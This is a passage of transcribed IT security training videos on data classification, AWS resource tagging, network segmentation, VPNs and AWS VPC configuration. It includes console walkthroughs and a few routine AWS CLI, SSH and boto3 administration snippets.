Find out how to use the appropriate tools to identify and classify sensitive systems and data.
Objectives
use the appropriate tools to identify and classify sensitive systems and data
[Video description begins] Topic title: Asset Discovery and Management. The presenter is Dan
Lachance. [Video description ends]
From an IT security perspective, you can't effectively protect something if you don't know you have it.
And so it's important then to be able to discover assets that are crucial to the organization so that the
appropriate security controls can be put in place and periodically reviewed to ensure the protection of those
assets. So one of the things to consider is data retention policies. How long should data be retained? But in
order for that to be effective, we have to be able to classify data first because certain types of data such as
financial data, due to regulations might need to be retained for longer than things like employee onboarding
documentation.
We also have to think about metadata accuracy that might have been applied to data assets, whether it's cloud
based resources or files on a file server. Metadata is extra descriptive information, such as flagging a Microsoft
Excel spreadsheet as being personally identifiable information or PII. So data can be classified using a number
of different tools that can look at that metadata and treat that data accordingly. So we have to have the supporting infrastructure, including the software that can be used to discover and inventory data, so that data that's classified differently gets treated differently.
Data classification means identifying data types. And the locations of those data types. And the appropriate
security clearances that users would require to access that data. We also have to determine any existing
security controls that might already be in place to support the protection of that data. Let's say we're talking,
for example, about credit card holder data. And that might be spread out across multiple retail locations. And
we might require employees to have a specific security clearance. So maybe they sign in using specific
mechanisms, like multi-factor authentication before even gaining access to credit card holder information. And existing controls would really be defined by the rules in the PCI DSS security standard, which applies to credit
card holder information held by vendors or merchants, retailers.
Data classification applies also internally. So we might classify onboarding data differently than we would
budgets or organizational charts which would be more sensitive in nature. So they should be protected
differently and perhaps backed up and stored for a different period of time than onboarding data. Then
depending on the nature of your industry, you might have very sensitive data, like medical patient information,
financial information. PHI is protected health information and PII is personally identifiable information,
essentially anything that can be traced back to an individual user, whether it's health related or not. And in some cases, depending on laws or regulations, you might not be allowed to store data in the cloud; it might have to be stored on-premises.
Then there's data that might be classified as being public, like marketing brochures or product and service
documentation. So by flagging different types of data, such as files on file servers in these different ways, it
allows us to more easily secure data appropriately. Again, naturally, spending more time on security controls to
secure sensitive data makes sense compared to publicly available data. The next thing to consider is that the
security controls that are put in place to protect different types of data will vary depending on how that data is
classified. For example, anything top secret would have more security controls in place or more strict security
controls in place than would otherwise be there.
So we might have controls related to Multi-Factor Authentication, MFA, or encryption of varying types using
different ciphers and different key lengths. We might enable full auditing on sensitive information on a server
where we might not audit anything at all for product brochures. Malware scanning might differ for different
classifications of data. We might apply data loss prevention only for company or trade secrets. Or we might
enable data synchronization and replication to increase data availability in case of an outage. We might also
have policies in place for how data gets sanitized. For example, sensitive financial information might be
required to be retained for seven years as an example. But then after that time, it needs to be disposed of in a
secured manner compared to product brochures which might not need any specific type of data deletion
technique to be employed.
[Video description begins] Data Discovery Challenges - Location. [Video description ends]
The other thing these days with cloud computing is to think about the locations. If you've replicated data in
different regions around the world, you need to be aware of that that's been done. So that when data is removed
in one site, you can assure it's been removed in others in accordance with data sanitization policies. So
replication is something to think about. The other is content delivery networks or CDN. A CDN replicates web
app content to different locations, so that when users in those locations request that content, it's served up locally. So it reduces network latency. We have to bear this in mind when we are inventorying data assets that
need to be classified.
In this video, you will learn how to add metadata to cloud resources for organizational and billing purposes.
Objectives
[Video description begins] Topic title: Cloud Resource Tagging. The presenter is Dan Lachance . [Video
description ends]
In a cloud computing environment, you have the option of tagging cloud resources. Cloud resources would
include things like virtual machines deployed into the cloud, cloud storage configurations, databases deployed
into the cloud, user accounts created in the cloud, that type of thing. Now tagging means you're adding extra
information or metadata to those resources, maybe to assign it to a department, a region, a cost center, project
manager, any of those things.
[Video description begins] A web page called "AWS Management Console" opens. The page is divided into
three sections labelled "AWS services", "Access resources on the go", and "Explore AWS ". The AWS services
section contains a search bar labelled “Find Services”. [Video description ends]
So here in AWS, Amazon Web Services, I've signed in to my account. Here in the console, I'm going to go
under All services, Compute, EC2.
[Video description begins] A web page called "EC2 Management Console" opens. It is divided into two parts.
The first part is a navigation pane. The second part is a content pane. [Video description ends]
EC2 stands for Elastic Compute Cloud, and it's all about virtual machines and the resources related to them running in the AWS cloud. So for example, if I go to the Instances view, I'll see the EC2 instances or virtual machines that were deployed.
[Video description begins] He clicks an option called "Instances" in the navigation pane and the
corresponding page opens in the content pane. It includes a table with six columns and four rows. The column
headers include Name, Instance ID, Instance Type, Availability Zone, Instance State, and Status
Checks. [Video description ends]
Although notice that under Instance State they're all stopped, they're not running. But that doesn't matter when
it comes to resource tagging.
[Video description begins] He selects WinSrv2019-2 under the Name column header. A new section opens
under the table. It contains tabs called "Description", "Status Checks", "Monitoring", and "Tags". [Video
description ends]
So for example if I select a specific EC2 instance up here in the list, down below I can go down under the Tags
tab.
[Video description begins] He clicks the Tags tab. [Video description ends]
Here the only key and value pair I have is the Name tag, which is a Value of WinSrv2019-2 and that's what's
showing up here in the view.
Now the rules will vary from one cloud provider to another, but in AWS, you can have up to 50 tags for a single resource. So this is only one; we can have 49 more. So I'm going to click Add/Edit Tags.
[Video description begins] He clicks a button called "Add/Edit Tags" in the Tags tab. A dialog box called
"Add/Edit Tags" opens. [Video description ends]
[Video description begins] He clicks a button called "Create Tag". [Video description ends]
[Video description begins] He enters text "Region" under the Key column header and "Eastern" under the
Value column header. [Video description ends]
So I'm going to put in Eastern, and I'll Save it and then that tag shows up.
[Video description begins] He clicks a button called "Save" and the dialog box closes. [Video description
ends]
[Video description begins] He clicks the Add/Edit Tags button. The Add/Edit Tags dialog box opens. [Video
description ends]
[Video description begins] He clicks the Create Tag button. He enters text "Project" under the Key column
header and "XYZ" under the Value column header. [Video description ends]
Now notice it's popping up with these items already, because if the name of a tag was already used, it'll show up in the list. See this here: as I type in Pr, Project shows up. It's already been used. If I type in X, well, for that particular tag, the value XYZ has already been used. And that might be okay. It's convenient. It's like an
autofill. So I'm going to go ahead and tie that tag to it. Now we can also tag resources using command line
tools and programmatically, but here we're just using the GUI. I'm going to go ahead and Save that.
[Video description begins] He clicks the Save button and the dialog box closes. [Video description ends]
[Video description begins] He points to the WinSrv2019-2 instance in the table. [Video description ends]
Now why would you do this? One of the reasons is it just helps you organize and manage and search for items
by tags and their values. For example, if I click on the Tags view over on the left, I can see all of the tags here
and values that were used.
[Video description begins] He clicks an option called "Tags" in the navigation pane and the corresponding
page opens in the content pane. It includes a table. The table includes seven columns and several rows. The
column headers include Tag Key, Tag Value, Total, Volumes, and Snapshots. [Video description ends]
And I can see the total number of Instances of those tags. For example, Project XYZ, there are two instances of
that being used. And if I click on the link here for that, then I'll get a sense of where it's actually being used.
[Video description begins] The corresponding page opens. It includes a table with three columns and several
rows. The column headers are Resource ID, Project, and Name. [Video description ends]
So I can see here from the list, it's on my two WinSrv2019 virtual machines. I can see that the Project tag here,
can see the Project column at the top, has XYZ as a value.
[Video description begins] He clicks the Tags options in the navigation pane and the corresponding page
opens in the content pane. [Video description ends]
Now you can also of course, search for specific keys and/or values. So if I'm interested, for example, in
project, well I can type in project and press Enter.
[Video description begins] He enters project in a search box called "Search Keys" and corresponding details
are displayed in the table. [Video description ends]
And I can see that for the project Tag Key, the only value that's been used here is XYZ. Now let's change that
just for fun. I'm going to go back to Instances, let's say I pick on a Linux instance and down below under Tags,
I'll click Add/Edit and then create, Project let's say ABC.
[Video description begins] He clicks the Add/Edit Tags button. The Add/Edit Tags dialog box opens. He then
clicks the Create Tag button. [Video description ends]
[Video description begins] He enters text "Project" under the Key column header and "ABC" under the Value
column header. He clicks the Save button and the dialog box closes. [Video description ends]
So there's project ABC. So now if we go back to Tags and we tell it we're interested in the Project Tag Key, and you might have to click the Refresh button since we just did it, you will see there are now at least two variations of the Tag Value for that same Tag Key of Project.
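The same tagging can also be done from the AWS CLI, which comes in handy for scripting. Here is a minimal sketch; the instance ID is a hypothetical placeholder, and the tag keys and values mirror the ones used in this demo.
# Tag an instance with Project and Region key/value pairs
aws ec2 create-tags --resources i-0123456789abcdef0 --tags Key=Project,Value=ABC Key=Region,Value=Eastern
# List every resource that carries the Project tag key
aws ec2 describe-tags --filters "Name=key,Values=Project"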
5. Video: Network Segmentation (it_cscysa20_10_enus_05)
Upon completion of this video, you will be able to recognize methods for enhancing security with network
segmentation.
Objectives
[Video description begins] Topic title: Network Segmentation. The presenter is Dan Lachance. [Video
description ends]
How your network is laid out and broken up and how devices are placed on those networks can have a big
impact on the security of your network environment. So it's important to think that we might have multiple
network segments for different purposes such as a management network. For example, in a data center, servers
might have a second network interface connected to a separate network switch, which is used solely by
administrators for management purposes. We can also create different network segments or subnets, or
VLANs, depending on your environment for app isolation purposes.
For example, if we've got a mission critical app, we might want it to be on its own network segment with a
limited access on a required basis only to that network. We can also use network segmentation for device
isolation. This is used often to secure devices by simply placing them on their own isolated network. So that if
they're compromised, it doesn't automatically mean everything else on that network is compromised,
because there's nothing else on the network. And so this is a great way to deal with IoT devices that might not
be as secure as needed by your organization's security policies. Then there's air gapping. Air gapping means
physically not having a network connection to another network.
For example, if we've got a manufacturing environment with industrial robotic equipment manufacturing nuts
and bolts, we might not want that to be reachable from the Internet unless there's a very good reason. And so
we might make sure it's not physically wired into any network that would allow access from the Internet, and
also make sure that there's no wireless connectivity on that secured network. That is air gapping. And
sometimes that is required to secure a network. The downfall, of course, is remote management capabilities
would be very limited. And if you must have remote management capabilities, then using secured solutions
over the network like VPNs might be in order.
[Video description begins] Virtual Local Area Network (VLAN). [Video description ends]
A virtual local area network or VLAN is configured on a network switch. So if you've got a 24-port Ethernet switch, by default, all of those 24 ports are in one default VLAN. So they're not
segregated from one another. However, you can configure multiple VLANs within a switch, or even across switch trunks. And those VLAN memberships can be determined by the physical ports that devices are plugged into, or be software-based, such as based on what their IP address is, regardless of the port they're plugged into. We can also use this for isolating IoT devices.
In the cloud network environment, we normally don't have direct access to the underlying network
infrastructure hardware like routers and switches. Instead, we use software defined networking or SDN to
make our network configurations using command line tools or a GUI which in turn modifies the network
configuration of underlying devices at the cloud provider network. So we can build multiple VPCs. You might
wonder, what's a VPC? A VPC is a virtual private cloud. In other words, it's a virtual network. Just like on-
premises, in the cloud, you would have to plan out how many VPCs are required and how they will be used.
Then you think about the subnets that you might define within a VPC.
For example, you might have a VPC in a particular geographical region in the cloud, such as central Canada.
And then you might break that up into a couple of subnets, one that will be used for production purposes and
another that might be used for testing sandbox purposes. You might consider deploying cloud virtual machines
or VM instances with only private IP addresses. If you assign a public IP address to every virtual machine
deployed in the cloud, then potentially, it is reachable from the Internet. That is probably not the best way to
deploy those virtual machines from a security perspective, because the potential is they're reachable from the
Internet. You might say, well, I need to manage those virtual machines from on-premises, essentially from the Internet.
Well, you can lock that down with firewall rules to limit from where remote management is allowed. And you
might require a VPN connection prior to allowing access to the private IPs of the VMs, or even VPN access to
a jump box that is publicly visible from the Internet through which you would then gain access to the private
network, where the VMs that only have a private IP address would be reachable. You can also configure
routing table entries in the cloud to limit network access. You can also use the benefits of a cloud access
security broker or a CASB. A CASB is used where security policies are defined to control access to cloud
resources and also to audit cloud resource activity.
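For instance, carving a VPC in a region into a production subnet and a testing subnet, as described above, could look like this with the AWS CLI. This is only a sketch; the CIDR blocks are arbitrary and the VPC ID is a hypothetical placeholder for the value returned by the first call.
# Create a VPC with a 10.0.0.0/16 address space
aws ec2 create-vpc --cidr-block 10.0.0.0/16
# Carve out a production subnet and a testing subnet within that VPC
aws ec2 create-subnet --vpc-id vpc-0123456789abcdef0 --cidr-block 10.0.1.0/24
aws ec2 create-subnet --vpc-id vpc-0123456789abcdef0 --cidr-block 10.0.2.0/24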
Remote host management remains an important aspect of designing security when it comes to deploying
virtual machines in the cloud. Secure Shell is used to manage many different network devices as well as Linux
and UNIX hosts. And Remote Desktop Protocol, RDP, is used to manage Windows hosts. Now SSH uses port
22 for remote management of UNIX and Linux and network devices as we've mentioned. RDP uses port 3389
for remote management of Windows hosts. Now, having a public IP address assigned to a virtual machine in
the cloud or any server that is publicly visible is not a great idea. There are known vulnerabilities with certain
versions of RDP, for example, you don't want that exposed directly to the Internet.
Instead, as we've mentioned, you might want to have a VPN connection that must be authenticated to prior to
allowing access to the private IP of Linux and Windows hosts. Or you might use a jump box that has a public
IP address that's reachable, ideally only through a VPN connection. And after successful authentication, access
would be allowed to the cloud-based virtual machines that would only have private IP addresses.
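As a small illustration of that jump box pattern, an administrator could hop through the publicly reachable box to hosts that only have private addresses. The hostnames and private IPs here are hypothetical.
# SSH to a private Linux host by jumping through the jump box (-J is ProxyJump)
ssh -J admin@jumpbox.example.com admin@10.0.1.5
# Reach RDP on a private Windows host by forwarding local port 13389 through the jump box,
# then pointing the RDP client at localhost:13389
ssh -L 13389:10.0.1.6:3389 admin@jumpbox.example.com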
[Video description begins] Topic title: VPNs. The presenter is Dan Lachance. [Video description ends]
Connecting over the Internet to a remote location that might contain sensitive information, sensitive servers,
needs to be secured.
[Video description begins] Virtual Private Network (VPN). [Video description ends]
And often that's done through a virtual private network or VPN. A VPN is an encrypted point-to-point network
tunnel. What does that mean? It means from a device that's trying to make a connection to a remote location,
it's talking to that remote location at the network perimeter. And after a successful authentication and
negotiation of security standards, such as protocols that will be used. Then an encrypted tunnel is established
between those two endpoints.
Anything transmitted between those two endpoints over the Internet is secured, it's encrypted. It can't be
captured, well, it can be captured, it's just that it can't be made sense of because it's encrypted. So it allows
secure connectivity over an untrusted network such as the Internet. Now in order to use a VPN at the network
level, you need a VPN appliance. A VPN appliance can be hardware or software. But it's going to need to have
a public IP address that is reachable from the Internet. And you configure either a pre-shared key, PSK. This is
a symmetric key that's used on both ends of the connection to establish the tunnel, it's a secret. Or you might
use something like a PKI certificate to authenticate two devices together to establish the VPN tunnel.
Common VPN protocols include point-to-point tunneling protocol or PPTP. PPTP is known to have some
security vulnerabilities; you should try to stay away from it as much as possible. Others include Layer 2 Tunneling Protocol with IPsec, and HTTPS-based VPNs, otherwise called SSL VPNs. But technically SSL is a deprecated security protocol, so you're better off calling it an HTTPS VPN. The benefit of an HTTPS type of VPN is that it's
firewall friendly. It normally uses Port 443, which is allowed at least in an outbound direction on most
networks. A site-to-site VPN, like the name implies, links two sites together.
Whether it's two branch offices that are each connected to the Internet, you might want an encrypted tunnel to
securely exchange and transmit data between those locations. But as pictured in our diagram, you can also
have an encrypted VPN tunnel with your on-premises network, pictured on the left. Connecting into the cloud,
pictured on the right, having a site-to-site link between those locations. Again, after the tunnel is established,
anything sent between those two locations is completely protected, it's encrypted.
Now the Site A listed on the left would have the VPN appliance, hardware or software with the public IP
address. And site B in this case, the cloud, will also have a VPN appliance configured with a public IP address.
Then after the tunnel is established, we're good to go. Now, in this particular example, all of the client devices, say on your on-premises network, do not need to have individual VPN client configurations to access
resources in the cloud through the VPN tunnel. All they have to do is route their traffic through a router that
knows how to send traffic through the VPN tunnel to IP address ranges on the other side of the tunnel in the
cloud.
Client-to-site VPNs are widely popular as well. These are used when you've got users that might be traveling for work, and while they're away at a customer site or working at a hotel at night, they have a secured tunnel to corporate resources over the Internet; it's an encrypted connection. So this is done by making sure that we have
a VPN client configured on the device, whether it's a smartphone or a laptop. And configure it accordingly
with the required credentials.
The user might have to enter a username and password, enter a code from a key fob, or maybe the device
requires a PKI certificate to complete the authentication to the VPN. Now, of course, whether the site is a
cloud environment or just an office environment, either way you need a VPN appliance that is reachable by the
VPN client. The configuration of the VPN determines whether it uses Layer 2 Tunneling Protocol with IPsec
or whether it's an HTTPS-based VPN, whether it requires certificates or just a pre-shared key, and so on.
[Video description begins] Configuring a Cloud Site-to-Site VPN. [Video description ends]
So here are the high-level steps in configuring a cloud site-to-site VPN, meaning the target is a cloud
environment, a public cloud provider. The first thing you'd have to do in the cloud is make a representation of
the customer's on-premises VPN appliance. That's often called a customer gateway, and you configure it in the
cloud environment. Next, you would create a cloud representation of a VPN appliance; that's usually done
with a few clicks of a mouse, to be honest. Finally, you create a VPN connection that links the two appliances
together, and that's where you would specify details about how the tunnel is established, how authentication
works, which IP addresses might be assigned to connecting clients, and so on.
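To make those three steps concrete, here is a minimal scripted sketch using Python and the AWS boto3 SDK. The region, public IP address, ASN, and static-routing choice are hypothetical placeholders rather than values from this course; the three calls mirror the customer gateway, virtual private gateway, and VPN connection steps just described.

import boto3

# Sketch: the three high-level pieces of an AWS site-to-site VPN.
# The region, public IP, and ASN below are hypothetical placeholders.
ec2 = boto3.client("ec2", region_name="us-east-1")

# 1. Represent the on-premises VPN appliance as a customer gateway.
cgw = ec2.create_customer_gateway(
    BgpAsn=65000,              # on-premises ASN (a value is required even for static routing)
    PublicIp="203.0.113.10",   # public IP of the on-premises VPN appliance
    Type="ipsec.1",
)["CustomerGateway"]

# 2. Create the cloud-side representation of a VPN appliance (virtual private gateway).
vgw = ec2.create_vpn_gateway(Type="ipsec.1")["VpnGateway"]

# 3. Create the VPN connection that links the two appliances together.
vpn = ec2.create_vpn_connection(
    CustomerGatewayId=cgw["CustomerGatewayId"],
    VpnGatewayId=vgw["VpnGatewayId"],
    Type="ipsec.1",
    Options={"StaticRoutesOnly": True},   # static routing; use False when BGP is supported
)["VpnConnection"]

print("VPN connection state:", vpn["State"])   # stays 'pending' until the tunnel comes up

Note that the virtual private gateway would still need to be attached to a VPC before traffic can flow, which is the detached state the demonstration below calls out.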
Learn how to connect an on-premises network to the Amazon Web Services cloud.
Objectives
link an on-premises network to the Amazon Web Services cloud
[Video description begins] Topic title: Cloud Site-to-site VPN Deployment. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll be configuring a site-to-site VPN. So specifically, the goal here is to link an on-
premises network with the AWS cloud environment using an encrypted VPN tunnel.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
So in order to do this, you have to know a few things. For example, you have to have access to manage AWS
in the first place. I'm already signed in to the Management Console. But you would also have to know things
like the public IP address of your on-premises VPN appliance. So let's get started here by searching for vpc,
which stands for Virtual Private Cloud. VPCs are everything networking in the AWS cloud, which is why I
want to launch that console.
[Video description begins] He clicks a link called "VPC" and a web page called "VPC Management Console"
opens. [Video description ends]
Because in the VPC Management Console, besides the standard VPCs or virtual networks and subnets defined
here in the cloud, if you scroll down far enough in the left-hand navigator, you'll see Virtual Private Network
(VPN). The first thing I'm going to do is create a customer gateway. So I'll click that on the left and I'll click
the button at the top.
[Video description begins] He clicks an option called "Customer Gateways" and the corresponding page
opens in the content pane. He clicks a button called "Create Customer Gateway". A page called "Create
Customer Gateway" opens. [Video description ends]
A customer gateway represents your on-premises VPN appliance. So I'm going to call this CustomerGW-
Central1. The type of on-premises VPN appliance you're using will determine whether you support dynamic or
static routing. If you've got an on-premises VPN hardware appliance and it supports Border Gateway
Protocol or BGP, then you can go ahead and enable Dynamic routing. Otherwise, you can leave it on
Static. Let's say I've got an on-premises Windows Server configured as a VPN appliance. So I have to know
the public-facing on-premises IP address of that device. So I'm going to put here, let's say, 200.1.1.1. That is a
public IPv4 address. Next, we can choose a PKI certificate if we want to use that to secure authentication with
the VPN tunnel. I don't have that, so I'm just going to go ahead and click Create Customer Gateway.
[Video description begins] He clicks a button called "Create Customer Gateway". [Video description ends]
It says it succeeded, and I can see the configuration here for it.
[Video description begins] He clicks a button called "Close". [Video description ends]
There it is, CustomerGW-Central1. Now the next thing I need to do is define the other side of the VPN
connection. It's a two-way street: to set up a site-to-site tunnel, you need a configuration for VPN appliances
on both sides of the connection. The cloud side is called a Virtual Private Gateway here in Amazon Web
Services.
[Video description begins] The corresponding page opens. [Video description ends]
So I'm going to click on that view on the left and I'm going to click the Create Virtual Private Gateway button.
[Video description begins] A page called "Create Virtual Private Gateway" opens. [Video description ends]
And I'm going to call this VPGW, Virtual Private Gateway1. And I can determine whether I want to use the
Amazon default Autonomous System Number or ASN versus a Custom ASN. I'm going to leave it on the
Amazon default Autonomous System Number or ASN and then I'll choose Create Virtual Private Gateway and
it's here.
[Video description begins] He clicks a button called "Create Virtual Private Gateway". He further clicks a
button called "Close". [Video description ends]
However, it is currently detached. So what we need to do now is link the customer gateway with the Virtual
Private Gateway. We do that with Site-to-Site VPN Connections.
[Video description begins] The corresponding page opens. [Video description ends]
So I'm going to click on that view on the left and I'll click Create VPN Connection.
[Video description begins] He clicks a button called "Create VPN Connection" and the corresponding page
opens. [Video description ends]
So I'm going to call this SiteA_AWS_VPN. And it's going to be Virtual Private Gateway. So I have to choose
the Virtual Private Gateway from the list. We just defined it, it's called VPGW1.
[Video description begins] He clicks a drop-down list box called "Virtual Private Gateway" and selects an
option called "vqw-000826ec4721ec2d9". [Video description ends]
Now, for the Customer Gateway, we already have an existing one defined. So I'm just going to choose it from
the list here, that's my CustomerGW-Central1.
[Video description begins] He clicks a drop-down list box called "Customer Gateway ID" and selects an
option called "cqw-03adf7f008cef9a8d". [Video description ends]
And down below, I can determine if I want to use Dynamic or Static routing. Now, your on-premises VPN
appliance needs to support Border Gateway Protocol or BGP if you want to use Dynamic routing. If we don't
have that support, we could choose Static and start entering static IP address prefixes. I'm going to leave it on
Dynamic for this VPN link. Down below, I can specify some CIDR IP address ranges if I choose, and also the
pre-shared key. Notice it wants to create two tunnels; the PSK is used to authenticate both ends of the
connection so that we have a tunnel that's up and running. But I'm going to let it all be generated by Amazon.
You can see that's what is set here. I'm going to use all the defaults, click Create VPN Connection, and then
close out.
[Video description begins] He clicks a button called "Create VPN Connection". He further clicks a button
called "Close". [Video description ends]
And we now have a site-to-site VPN link. Now, the State is listed as pending, and it will stay that way until a
connection is actually made between the two VPN appliances. Also notice at the top here, we've got a
Download Configuration button.
[Video description begins] He clicks a button called "Download Configuration" A dialog box called
"Download Configuration" opens. [Video description ends]
Let's say that on-premises, we've got a specific Cisco platform running our VPN appliance.
[Video description begins] He clicks a drop-down list box called "Vendor" and selects an option called "Cisco
Systems, Inc.". [Video description ends]
So we can select that and the software revision number and download the configuration file that we could use
on that device.
[Video description begins] He clicks a drop-down list box called "Platform" and selects an option called "ASA
5500 Series". [Video description ends]
In this video, find out how to design a networking strategy for the cloud.
Objectives
[Video description begins] Topic title: Cloud Networking. The presenter is Dan Lachance. [Video description
ends]
Software Defined Networking or SDN is a phrase that you'll often hear coupled with cloud computing,
specifically with Infrastructure as a Service or IaaS at the network level. The idea with SDN is to hide the
underlying technical complexities from the cloud user that's making a network configuration, and then let the
underlying hardware actually make it all happen. With software defined networking, we really have a layer,
whether we're using a GUI or a CLI interface to create this network configuration in the cloud.
We've got this SDN layer that sits between the user and the underlying physical network devices, so it makes
things easier. Instead of a user defining a subnet and having to know how to do that at the Cisco IOS
command-line level, they might just have a friendly web GUI where they enter in a few things, click a few
buttons, and then it's done. That's where SDN kicks in. So it allows for the configuration of underlying
infrastructure devices like routers, switches, gateways, that type of thing.
The other thing to think about is that in the cloud there are multiple network configurations we might work
with that use SDN. Configuring VPNs in the cloud, maybe to link an on-premises network to the cloud or for
remote client connectivity, can be done very easily with command-line tools or through a GUI without
knowing the actual underlying complexities. We also have to think about the number of virtual cloud-based
networks we want to have, the IPv4 or IPv6 address ranges we want to use, and maybe even any custom
routes, perhaps to forward traffic coming in from the Internet first to a firewall appliance for inspection before
allowing the traffic in. All of these things we'd have to plan for, and we can configure them using software
defined networking without knowing how to actually configure those settings on the underlying network
infrastructure hardware. That would also include things like network traffic firewall rules, through access
control lists or ACLs.
[Video description begins] Virtual Private Cloud (VPC). [Video description ends]
Consider the example of a Virtual Private Cloud or VPC in Amazon Web Services. We can configure an IPv4
CIDR block, an address range for that network environment in the cloud, or it could be an IPv6 block. This
allows us to define a virtual network in the AWS cloud, again, without actually having to connect to physical
hardware to configure virtual LANs, VLANs, and so on.
And when you configure a VPC in the Amazon Web Services cloud, there are a number of network
configuration items that go along with that. Like the number of subnets that you're going to deploy and the
range of IP addresses that will be available for each subnet. DHCP options, whether you want to use DHCP or
not. Configuring network ACLs, in other words, subnet firewall rules to control traffic flow into and out of the
subnet in the cloud. Routing table entries to control traffic flow. Even tagging, adding extra metadata perhaps
to tie network configurations in the cloud to departments, regions, or cost centers, that type of thing.
Managing cloud network components can be done with GUI tools, with templates. Templates are great in that
you can actually define more than one type of cloud resource. In a template, you might define a network in the
cloud, a couple of subnets, a couple of virtual machines, a database server, a storage bucket, and so on, all
within a single template. Of course, you could have a single template that deploys a single virtual network in
the cloud. You can also use scripts because there are always command line tools, such as using a Command
Line Interface, a CLI or PowerShell cmdlets, that allow you to create and manage cloud network resources
through SDN. All of this is available.
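As a small illustration of that script-based approach, here is a sketch, assuming Python and the AWS boto3 SDK, that creates a virtual network, carves out a subnet, and tags both resources entirely through the SDN layer; the CIDR blocks and tag values are made-up examples.

import boto3

# Sketch: provision a cloud virtual network through SDN with a script.
# The CIDR blocks and tag values are hypothetical examples.
ec2 = boto3.client("ec2", region_name="us-east-1")

# Create the virtual network (a VPC, in AWS terms).
vpc_id = ec2.create_vpc(CidrBlock="10.20.0.0/16")["Vpc"]["VpcId"]

# Carve one subnet out of the VPC's address range.
subnet_id = ec2.create_subnet(VpcId=vpc_id, CidrBlock="10.20.1.0/24")["Subnet"]["SubnetId"]

# Add metadata (tags), for example to tie the network to a department or cost center.
ec2.create_tags(
    Resources=[vpc_id, subnet_id],
    Tags=[{"Key": "CostCenter", "Value": "IT-Networking"}],
)

print("Created", vpc_id, "and", subnet_id)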
The network in the cloud that you work with can consist of VLANs and VNets. What this really means is that
at the underlying network level you might actually be configuring a VLAN, but at the cloud level that you
interact with, it might be called a VNet or Virtual Network, or a Virtual Private Cloud, a VPC. Either way,
when you define a virtual network in the cloud, you're going to have to define DNS settings. In other words,
do you want to use cloud provider DNS servers for name resolution, or do you want to use custom DNS
servers, as might be required if you're configuring your own services like Microsoft Active Directory manually
in the cloud? You also would have to determine if you want to configure specific DHCP options for devices that
receive their IP configuration automatically in the cloud. When we say devices, we're really simply talking
about cloud-based virtual machines.
[Video description begins] Topic title: Cloud VPC Deployment. The presenter is Dan Lachance. [Video
description ends]
In Amazon Web Services, a VPC, or Virtual Private Cloud, is simply a virtual network that you define in the
AWS Cloud environment. Now, you would plan this ahead of time, thinking about how many subnets you will
need within that VPC, their IP address ranges, and which type of services you will be deploying into those
subnets, such as databases or custom virtual machines that you configure yourself.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
To get started here in the AWS Management Console, I'm going to search for vpc. And I'll click VPC, which
will open the VPC Management Console.
[Video description begins] A web page called "VPC Management Console" opens. [Video description ends]
When I click VPCs on the left, I'll see any existing VPCs. We've got one called VPC1.
[Video description begins] He clicks an option called "Your VPCs" in the navigation pane and the
corresponding page opens. [Video description ends]
I'm going to create a new one, so I'm going to click Create VPC, and it's going to be called VPC2.
[Video description begins] He clicks a button called "Create VPC". A page called "Create VPC"
opens. [Video description ends]
Now, I need to assign it either an IPv4 or an IPv6 CIDR block. CIDR stands for Classless Inter-Domain
Routing. It's notation that looks like this: let's say I want to use 15.0.0.0/16. What is that? Well, 15.0.0.0 is a
network address. The /16 notation, which is part of CIDR, is telling me how many bits are in the subnet mask,
starting from the left. So it's the first 16 bits, the first 2 bytes, since there are 8 bits in a byte. In other words,
15.0 is the network address. Now, any subnets that I define within the VPC have to use a CIDR block that falls
under 15.0. I'm going to leave the Default tenancy, I don't need Dedicated hardware to house my VPC. And
I'm going to click Create.
[Video description begins] He clicks a button called "Create". [Video description ends]
And that's it. VPC is created that quickly.
[Video description begins] He clicks a button called "Close". [Video description ends]
And we can see it listed up here up at the top. However, what I want to do is define some other settings. Now,
there are a lot of settings already defined for it.
[Video description begins] He selects a VPC called "VPC2". The tabs labelled "Description", "CIDR Blocks",
"Flow Logs", and "Tags" are displayed. [Video description ends]
See, if you have a VPC selected down below under Description, it's got this Network ACL thing associated
with it. I can click that link to open up that view.
[Video description begins] He clicks a Network ACL called "acl-05318cd3d0cdf9663" in the Description
tab. [Video description ends]
A network ACL has inbound and outbound rules that either Allow or Deny specific types of traffic.
[Video description begins] A new page opens. It includes a table with five columns and one row. The column
headers are Name, Network ACL ID, Associated with, Default, and VPC. It also includes tabs labeled
"Details", "Inbound Rules", "Outbound Rules", "Subnet associations", and "Tags". [Video description ends]
[Video description begins] He clicks the Your VPCs option in the navigation pane and the corresponding page
opens. [Video description ends]
It's also got a DHCP options set automatically associated with it. We didn't do that, it just happens.
[Video description begins] He clicks a DHCP options set called “dopt-da7843bd” in the Description tab. A
new page opens. It includes a table and tabs labeled "Details" and "Tags". [Video description ends]
And really, all that does is set things like the domain name that will be used and whether we're using
Amazon-provided DNS name servers.
The other thing it does when you create a new VPC is it associates it with a routing table.
[Video description begins] He clicks the Your VPCs option in the navigation pane and the corresponding page
opens. [Video description ends]
So I've got a link for the route table here, where down below when it switches me to that view, I can see any
routes.
[Video description begins] He clicks a Route table option called “rtb-04c86882f478ea9d3” in the Description
tab. It includes a table and tabs labeled "Summary", "Routes", "Subnet Associations", "Edge Association",
"Route Propagation", and "Tags". [Video description ends]
And I can click Edit routes.
[Video description begins] He selects the Routes tab. [Video description ends]
And I can add custom routes, perhaps to things like Internet gateways to allow outbound Internet connectivity
and so on. So let's get back to VPC2.
[Video description begins] He clicks a button called "Edit routes" and the corresponding page opens. [Video
description ends]
[Video description begins] He clicks a button called "Cancel". [Video description ends]
Let's define a subnet within that range that will be linked with VPC2.
[Video description begins] He clicks the Your VPCs option in the navigation pane and the corresponding page
opens. [Video description ends]
[Video description begins] He clicks an option called "Subnets" in the navigation pane and the corresponding
page opens. He clicks a button called "Create subnet". A page called "Create subnet" opens. [Video
description ends]
It's going to be called VPC2_Subnet. And I'm going to tie that, of course, to VPC2, which I'll choose from the
list. And I'm going to specify, well, let's say I try this.
[Video description begins] He clicks a drop-down list box called "VPC" and selects an option called "vpc-
0ade256b9d107cd09". [Video description ends]
Let's say I try to put 15.1.0.0/16. When I click Create, it says that's not going to work, because your CIDR
range for this subnet is not within the CIDR range of the VPC. That's true, it's not under it. So what I could do
is something like this. Let's say I put in 15.0.1.0/24. In this case, I'm identifying that the first three bytes, first
24 bits, or the first three octets define the network. So in this case, the subnet network address is 15.0.1, 24-bit
